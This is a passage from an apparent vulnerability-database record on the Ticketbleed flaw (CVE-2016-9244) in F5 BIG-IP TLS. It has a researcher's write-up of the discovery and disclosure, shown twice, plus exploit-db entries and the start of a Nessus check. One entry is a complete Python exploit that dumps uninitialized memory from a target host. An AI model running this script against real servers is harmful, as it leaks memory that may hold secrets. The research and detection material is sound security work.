&Resumption{\n - Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n - SessionID: hs.serverHello.sessionId,\n + Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n + TicketBleed: len(hs.serverHello.sessionId) > len(hs.hello.sessionId) &&\n + bytes.Equal(hs.serverHello.sessionId[:len(hs.hello.sessionId)], hs.hello.sessionId),\n + ServerSessionID: hs.serverHello.sessionId,\n + ClientSessionID: hs.hello.sessionId,\n }\n return false, FixedSessionTicketError\n }\n \n\nBy picking 31 bytes I ensured the sensitive information leakage would be negligible.\n\nI then downloaded the latest zgrab results from the Censys website, which thankfully included information on what hosts supported Session Tickets, and completed the pipeline with abundant doses of `pv` and `jq`.\n\nAfter getting two hits in the first 1,000 hosts from the Alexa top 1m list in November, I interrupted the scan to avoid leaking the vulnerability and postponed to a date closer to the disclosure.\n\nWhile producing this writeup I completed the scan, and found between 0.1% and 0.2% of all hosts to be vulnerable, or 0.4% of the websites supporting Session Tickets.\n\n## Read more\n\nFor more details visit the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>) or [ticketbleed.com](<https://ticketbleed.com>), where you'll find a technical summary, affected versions, mitigation instructions, a complete timeline, scan results, IPs of the scanning machines, and an online test.\n\nOtherwise, you might want to [follow me on Twitter](<https://twitter.com/FiloSottile>).", "modified": "2017-02-09T02:14:44", "published": "2017-02-09T02:14:44", "id": "FILIPPOIO:32170BE31128BEE98AEEE466ABFDA40A", "href": "https://blog.filippo.io/finding-ticketbleed/", "type": "filippoio", "title": "Finding Ticketbleed", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-08T03:14:39", "bulletinFamily": "blog", "cvelist": ["CVE-2016-9244"], "description": "Ticketbleed (CVE-2016-9244) is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed.\n\nIf you suspect you might be affected by this vulnerability, you can find details and mitigation instructions at [ticketbleed.com](<https://ticketbleed.com>) (including an online test) or in the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>).\n\n\n\nIn this post we'll talk about how Ticketbleed was found, verified and reported.\n\n## JIRA RG-XXX\n\nIt all started with a bug report from a customer using Cloudflare [Railgun](<https://www.cloudflare.com/website-optimization/railgun/>).\n\n> **rg-listener <> origin requests fail with \"local error: unexpected message\"**\n> \n> A PCAP of the rg-listener <> origin traffic is attached and shows a TLS alert being triggered during the handshake.\n> \n> Worth noting the customer is using an F5 Load Balancer in front of the Railgun and the Origin Web Server: \n`visitor > edge > cache > rg-sender > F5 > rg-listener > F5 > origin web server`\n> \n> Matthew was unable to replicate by using a basic TLS.Dial in Go so this seems tricky so far.\n\nA bit of context on Railgun: Railgun speeds up requests between the Cloudflare edge and the origin web site by establishing a permanent optimized connection and performing delta compression on HTTP responses.\n\n\n\nThe Railgun connection uses a custom binary protocol over TLS, and the two endpoints are Go programs: one on the Cloudflare edge and one installed on the customer servers. This means that the whole connection goes through the Go TLS stack, crypto/tls.\n\nThat connection failing with `local error: unexpected message` means that the customer\u2019s side of the connection sent something that confused the Go TLS stack of the Railgun running on our side. Since the customer is running an F5 load balancer between their Railgun and ours, this points towards an **incompatibility between the Go TLS stack and the F5 one**.\n\nHowever, when my colleague Matthew tried to reproduce the issue by connecting to the load balancer with a simple Go `crypto/tls.Dial`, it succeeded.\n\n## PCAP diving\n\nSince Matthew sits at a desk opposite of mine in the Cloudflare London office, he knew I've been working with the Go TLS stack for our TLS 1.3 implementation. We quickly ended up in a joint debugging session.\n\nHere's the PCAP we were staring at.\n\n\n\nSo, there's the ClientHello, right. The ServerHello, so far so good. And then immediately a ChangeCipherSpec. Oh. Ok.\n\nA ChangeCipherSpec is how TLS 1.2 says \"let's switch to encrypted\". The only way a ChangeCipherSpec can come this early in a 1.2 handshake, is if session resumption happened.\n\nAnd indeed, by focusing on the ClientHello we can see that the Railgun client sent a Session Ticket.\n\n\n\nA Session Ticket carries some encrypted key material from a previous session to allow the server to resume that previous session immediately instead of negotiating a new one.\n\n\n\n_To learn more about session resumption in TLS 1.2, watch the first part of [the Cloudflare Crypto Team TLS 1.3 talk](<https://blog.cloudflare.com/tls-1-3-explained-by-the-cloudflare-crypto-team-at-33c3/>), [read the transcript](<https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/>), or the [\"TLS Session Resumption\" post](<https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/>) on the Cloudflare blog._\n\nAfter that ChangeCipherSpec both Railgun and Wireshark get pretty confused (HelloVerifyRequest? Umh?). So we have reason to believe the issue is related to Session Tickets.\n\nIn Go you have to explicitly enable Session Tickets on the client side by setting a `ClientSessionCache`. We verified that indeed Railgun uses this functionality and wrote this small test:\n \n \n package main\n \n import (\n \"crypto/tls\"\n )\n \n func main() {\n conf := &tls.Config{\n InsecureSkipVerify: true,\n ClientSessionCache: tls.NewLRUClientSessionCache(32),\n }\n \n conn, err := tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to connect: \" + err.Error())\n }\n conn.Close()\n \n conn, err = tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to resume: \" + err.Error())\n }\n conn.Close()\n }\n \n\nAnd sure enough, `local error: unexpected message`.\n\n## crypto/tls diving\n\nOnce I had it reproduced in a local `crypto/tls` it became a home game. `crypto/tls` error messages tend to be short of details, but a quick tweak allows us to pinpoint where they are generated.\n\nEvery time a fatal error occurs, `setErrorLocked` is called to record the error and make sure that all following operations fail. That function is usually called from the site of the error.\n\nA well placed `panic(err)` will drop a stack trace that should show us _what_ message is unexpected.\n \n \n diff --git a/src/crypto/tls/conn.go b/src/crypto/tls/conn.go\n index 77fd6d3254..017350976a 100644\n --- a/src/crypto/tls/conn.go\n +++ b/src/crypto/tls/conn.go\n @@ -150,8 +150,7 @@ type halfConn struct {\n }\n \n func (hc *halfConn) setErrorLocked(err error) error {\n - hc.err = err\n - return err\n + panic(err)\n }\n \n // prepareCipherSpec sets the encryption and MAC states\n \n \n \n panic: local error: tls: unexpected message\n \n goroutine 1 [running]:\n panic(0x185340, 0xc42006fae0)\n \t/Users/filippo/code/go/src/runtime/panic.go:500 +0x1a1\n crypto/tls.(*halfConn).setErrorLocked(0xc42007da38, 0x25e6e0, 0xc42006fae0, 0x25eee0, 0xc4200c0af0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:153 +0x4d\n crypto/tls.(*Conn).sendAlertLocked(0xc42007d880, 0x1c390a, 0xc42007da38, 0x2d)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:719 +0x147\n crypto/tls.(*Conn).sendAlert(0xc42007d880, 0xc42007990a, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:727 +0x8c\n crypto/tls.(*Conn).readRecord(0xc42007d880, 0xc400000016, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:672 +0x719\n crypto/tls.(*Conn).readHandshake(0xc42007d880, 0xe7a37, 0xc42006c3f0, 0x1030e, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:928 +0x8f\n crypto/tls.(*clientHandshakeState).doFullHandshake(0xc4200b7c10, 0xc420070480, 0x55)\n \t/Users/filippo/code/go/src/crypto/tls/handshake_client.go:262 +0x8c\n crypto/tls.(*Conn).clientHandshake(0xc42007d880, 0x1c3928, 0xc42007d988)\n \t/Users/filippo/code/go/src/crypto/tls/handshake_client.go:228 +0xfd1\n crypto/tls.(*Conn).Handshake(0xc42007d880, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:1259 +0x1b8\n crypto/tls.DialWithDialer(0xc4200b7e40, 0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0x4ff80, 0xc420072000, 0xc42007d118)\n \t/Users/filippo/code/go/src/crypto/tls/tls.go:146 +0x1f8\n crypto/tls.Dial(0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0xc42007ce00, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/tls.go:170 +0x9d\n \n\nSweet, let's see where the unexpected message alert is sent, at `conn.go:672`.\n \n \n 670 case recordTypeChangeCipherSpec:\n 671 if typ != want || len(data) != 1 || data[0] != 1 {\n 672 c.in.setErrorLocked(c.sendAlert(alertUnexpectedMessage))\n 673 break\n 674 }\n 675 err := c.in.changeCipherSpec()\n 676 if err != nil {\n 677 c.in.setErrorLocked(c.sendAlert(err.(alert)))\n 678 }\n \n\nSo the message we didn't expect is the ChangeCipherSpec. Let's see if the higher stack frames give us an indication as to what we expected instead. Let's chase `handshake_client.go:262`.\n \n \n 259 func (hs *clientHandshakeState) doFullHandshake() error {\n 260 c := hs.c\n 261\n 262 msg, err := c.readHandshake()\n 263 if err != nil {\n 264 return err\n 265 }\n \n\nAh, `doFullHandshake`. Wait. The server here is clearly doing a resumption (sending a Change Cipher Spec immediately after the Server Hello), while the client... tries to do a full handshake?\n\nIt looks like the client offers a Session Ticket, the server _accepts it_, but the client _doesn't realize and carries on_.\n\n## RFC diving\n\nAt this point I had to fill a gap in my TLS 1.2 knowledge. How does a server signal acceptance of a Session Ticket?\n\n[RFC 5077](<https://tools.ietf.org/html/rfc5077>), which obsoletes RFC 4507, says:\n\n> When presenting a ticket, the client MAY generate and include a \nSession ID in the TLS ClientHello. If the server accepts the ticket \nand the Session ID is not empty, then it MUST respond with the same \nSession ID present in the ClientHello.\n\nSo a client that doesn't want to guess whether a Session Ticket is accepted or not will send a Session ID and look for it to be echoed back by the server.\n\nThe code in `crypto/tls`, clear as always, does exactly that.\n \n \n func (hs *clientHandshakeState) serverResumedSession() bool {\n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n\n## Session IDs diving\n\nSomething must be going wrong there. Let's practice some healthy print-based debugging.\n \n \n diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go\n index f789e6f888..2868802d82 100644\n --- a/src/crypto/tls/handshake_client.go\n +++ b/src/crypto/tls/handshake_client.go\n @@ -552,6 +552,8 @@ func (hs *clientHandshakeState) establishKeys() error {\n func (hs *clientHandshakeState) serverResumedSession() bool {\n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n + println(hex.Dump(hs.hello.sessionId))\n + println(hex.Dump(hs.serverHello.sessionId))\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n \n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\n 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n \n\nAh. The F5 server is padding the Session ID to its maximum length of 32 bytes, instead of returning it as the client sent it. crypto/tls in Go uses 16 byte Session IDs.\n\nFrom there the failure mode is clear: the server thinks it told the client to use the ticket, the client thinks the server started a new session, and things get unexpected.\n\nIn the TLS space we have seen quite some incompatibilities like this. Notoriously, ClientHellos have to be either shorter than 256 bytes or longer than 512 [not to clash with some server implementations](<https://bugs.chromium.org/p/chromium/issues/detail?id=315828>).\n\nI was about to write this up as just another real world TLS quirk when...\n \n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\n 00000010 04 27 a8 4f 63 22 de 8b ef f9 a3 13 dd 66 5c ee |.'.Oc\".......f\\.|\n \n\nUh oh. Wait. Those are not zeroes. That's not padding. That's... memory?\n\nAt this point the impression of dealing with a Heartbleed-like vulnerability got pretty clear. The server is allocating a buffer as big as the client's Session ID, and then sending back always 32 bytes, bringing along whatever unallocated memory was in the extra bytes.\n\n## Browser diving\n\nI had one last source of skepticism: how could this not have been noticed before?\n\nThe answer is banal: all browsers use 32-byte Session IDs to negotiate Session Tickets. Together with Nick Sullivan I checked NSS, OpenSSL and BoringSSL to confirm. [Here's BoringSSL for example](<https://github.com/google/boringssl/blob/33fe4a0d1406f423e7424ea7367e1d1a51c2edc1/ssl/handshake_client.c#L1901-L1908>).\n \n \n /* Generate a session ID for this session based on the session ticket. We use\n * the session ID mechanism for detecting ticket resumption. This also fits in\n * with assumptions elsewhere in OpenSSL.*/\n if (!EVP_Digest(CBS_data(&ticket), CBS_len(&ticket),\n session->session_id, &session->session_id_length,\n EVP_sha256(), NULL)) {\n goto err;\n }\n \n\nBoringSSL uses a SHA256 hash of the Session Ticket, which is exactly 32 bytes.\n\n(Interestingly, from speaking to people in the TLS field, there was an idle intention to switch to 1-byte Session IDs but no one had tested it widely yet.)\n\nAs for Go, it\u2019s probably the case that client-side Session Tickets are not enabled that often.\n\n## Disclosure diving\n\nAfter realizing the security implications of this issue we compartmentalized it inside the company, made sure our Support team would advise our customer to simply disable Session Tickets, and sought to contact F5.\n\nAfter a couple misdirected emails that were met by requests for Serial Numbers, we got in contact with the F5 SIRT, exchanged PGP keys, and provided a report and a PoC.\n\nThe report was escalated to the development team, and confirmed to be an uninitialized memory disclosure limited to the Session Ticket functionality.\n\nIt's unclear what data might be exfiltrated via this vulnerability, but Heartbleed and the [Cloudflare Heartbleed Challenge](<https://blog.cloudflare.com/the-results-of-the-cloudflare-challenge/>) taught us not to make assumptions of safety with uninitialized memory.\n\nIn planning a timeline, the F5 team was faced with a rigid release schedule. Considering multiple factors, including the availability of an effective mitigation (disabling Session Tickets) and the apparent triviality of the vulnerability, I decided to adhere to the [industry-standard disclosure policy adopted by Google's Project Zero](<https://googleprojectzero.blogspot.co.uk/2015/02/feedback-and-data-driven-updates-to.html>): 90 days with 15 days of grace period if a fix is due to be released.\n\nBy coincidence today coincides with both the expiration of those terms and the scheduled release of the first hotfix for one of the affected versions.\n\nI'd like to thank the F5 SIRT for their professionalism, transparency and collaboration, which were in pleasant contrast with the stories of adversarial behavior we hear too often in the industry.\n\nThe issue was assigned CVE-2016-9244.\n\n## Internet diving\n\nWhen we reported the issue to F5 I had tested the vulnerability against a single host, which quickly became unavailable after disabling Session Tickets. That meant having both low confidence in the extent of the vulnerability, and no way to reproduce it.\n\nThis was the perfect occasion to perform an Internet scan. I picked the toolkit that powers Censys.io by the University of Michigan: zmap and zgrab.\n\nzmap is an IPv4-space scanning tool that detects open ports, while zgrab is a Go tool that follows up by connecting to those ports and collecting a number of protocol details.\n\nI added support for Session Ticket resumption to zgrab, and then wrote a simple Ticketbleed detector by having zgrab send a 31-byte Session ID, and comparing it with the one returned by the server.\n \n \n diff --git a/ztools/ztls/handshake_client.go b/ztools/ztls/handshake_client.go\n index e6c506b..af098d3 100644\n --- a/ztools/ztls/handshake_client.go\n +++ b/ztools/ztls/handshake_client.go\n @@ -161,7 +161,7 @@ func (c *Conn) clientHandshake() error {\n session, sessionCache = nil, nil\n hello.ticketSupported = true\n hello.sessionTicket = []byte(c.config.FixedSessionTicket)\n - hello.sessionId = make([]byte, 32)\n + hello.sessionId = make([]byte, 32-1)\n if _, err := io.ReadFull(c.config.rand(), hello.sessionId); err != nil {\n c.sendAlert(alertInternalError)\n return errors.New(\"tls: short read from Rand: \" + err.Error())\n @@ -658,8 +658,11 @@ func (hs *clientHandshakeState) processServerHello() (bool, error) {\n \n if c.config.FixedSessionTicket != nil {\n c.resumption = &Resumption{\n - Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n - SessionID: hs.serverHello.sessionId,\n + Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n + TicketBleed: len(hs.serverHello.sessionId) > len(hs.hello.sessionId) &&\n + bytes.Equal(hs.serverHello.sessionId[:len(hs.hello.sessionId)], hs.hello.sessionId),\n + ServerSessionID: hs.serverHello.sessionId,\n + ClientSessionID: hs.hello.sessionId,\n }\n return false, FixedSessionTicketError\n }\n \n\nBy picking 31 bytes I ensured the sensitive information leakage would be negligible.\n\nI then downloaded the latest zgrab results from the Censys website, which thankfully included information on what hosts supported Session Tickets, and completed the pipeline with abundant doses of `pv` and `jq`.\n\nAfter getting two hits in the first 1,000 hosts from the Alexa top 1m list in November, I interrupted the scan to avoid leaking the vulnerability and postponed to a date closer to the disclosure.\n\nWhile producing this writeup I completed the scan, and found between 0.1% and 0.2% of all hosts to be vulnerable, or 0.4% of the websites supporting Session Tickets.\n\n## Read more\n\nFor more details visit the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>) or [ticketbleed.com](<https://ticketbleed.com>), where you'll find a technical summary, affected versions, mitigation instructions, a complete timeline, scan results, IPs of the scanning machines, and an online test.\n\nOtherwise, you might want to [follow me on Twitter](<https://twitter.com/FiloSottile>).", "modified": "2017-02-09T02:14:44", "published": "2017-02-09T02:14:44", "id": "FILIPPOIO:40FACE5F541A5201E7FCDFC21AC6E3D2", "href": "https://blog.filippo.io/finding-ticketbleed/", "type": "filippoio", "title": "Finding Ticketbleed", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2017-02-11T00:59:51", "description": "F5 BIG-IP SSL Virtual Server - Memory Disclosure. CVE-2016-9244. Remote exploit for Hardware platform", "published": "2017-02-10T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP SSL Virtual Server - Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-10T00:00:00", "id": "EDB-ID:41298", "href": "https://www.exploit-db.com/exploits/41298/", "sourceData": "/*\r\n# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]\r\n# Date: [10.02.2017]\r\n# Exploit Author: [Ege Balc\u00c4\u00b1]\r\n# Vendor Homepage: [https://f5.com/]\r\n# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]\r\n# Tested on: [Multiple]\r\n# CVE : [CVE-2016-9244]\r\n\r\nPOC:\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41298/"}, {"lastseen": "2018-05-24T14:14:13", "description": "F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure. CVE-2016-9244. Remote exploit for Hardware platform", "published": "2017-02-14T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-14T00:00:00", "id": "EDB-ID:44446", "href": "https://www.exploit-db.com/exploits/44446/", "sourceData": "# -*- coding: utf-8 -*-\r\n#!/usr/bin/python\r\n# Exploit Title: Ticketbleed\r\n# Google Dork: n/a\r\n# Date: Exploit: 02/13/17, Advisory Published: 02/09/17 \r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: https://f5.com/\r\n# Software Link: https://support.f5.com/csp/article/K05121675\r\n# Version: see software link for versions\r\n# Tested on: F5 BIGIP 11.6\r\n# CVE : CVE-2016-9244\r\n# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)\r\nimport re, getopt, sys, socket\r\nfrom struct import *\r\ntry:\r\n from scapy_ssl_tls.ssl_tls import *\r\nexcept ImportError:\r\n from scapy.layers.ssl_tls import *\r\n\r\ndef banner():\r\n print '''\r\n lol ty filippo!\r\n ty tintinweb!\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\nhttps://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py\r\n'''\r\n\r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target port\\n\"\r\n \"\\n\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 443\\n\"\r\n \"python script.py --rhost 10.10.10.10 --rport 8443\")\r\n exit()\r\n\r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n\r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n\r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n return d\r\n\r\ndef ticketBleed (rhost, rport):\r\n h = (rhost,int(rport));\r\n version = TLSVersion.TLS_1_2\r\n secret = \"\"\r\n session_ticket = \"\"\r\n sid = \"\"\r\n cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=\"\")])\r\n sock.sendall(packet)\r\n sock.recvall()\r\n \tpacket_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()\r\n packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()\r\n sock.sendall(TLS.from_records([packet_ke, packet_ccs]))\r\n sock.sendall(to_raw(TLSFinished(), ctx))\r\n ret = sock.recvall()\r\n session_ticket = ret[TLSSessionTicket].ticket\r\n secret = ctx.master_secret\r\n #pretty(\"*\", \"ctx 1: \\n\" + str(ctx))\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id=\"A\", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])\r\n sock.tls_ctx.resume_session(secret)\r\n sock.sendall(packet)\r\n ret = sock.recvall()\r\n sid = ret[TLSServerHello].session_id\r\n #pretty(\"*\", \"ctx 2: \\n\" + str(ctx))\r\n pretty(\"+\", \"bled 'A' + 31 bytes: \\n\" + createDump(sid))\r\n\r\ndef main():\r\n rhost = None;\r\n rport = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n ticketBleed(rhost,rport)\r\n exit(0);\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44446/"}], "nessus": [{"lastseen": "2021-04-01T02:08:22", "description": "A BIG-IP SSL virtual server with the non-default Session Tickets\noption enabled may leak up to 31 bytes of uninitialized memory, aka\nthe Ticketbleed bug. (CVE-2016-9244)", "edition": 38, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-02-10T00:00:00", "title": "F5 Networks BIG-IP : F5 TLS vulnerability (K05121675) (Ticketbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL05121675.NASL", "href": "https://www.tenable.com/plugins/nessus/97091", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K05121675.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97091);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2016-9244\");\n\n script_name(english:\"F5 Networks BIG-IP : F5 TLS vulnerability (K05121675) (Ticketbleed)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A BIG-IP SSL virtual server with the non-default Session Tickets\noption enabled may leak up to 31 bytes of uninitialized memory, aka\nthe Ticketbleed bug. (CVE-2016-9244)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K05121675\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K05121675.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) 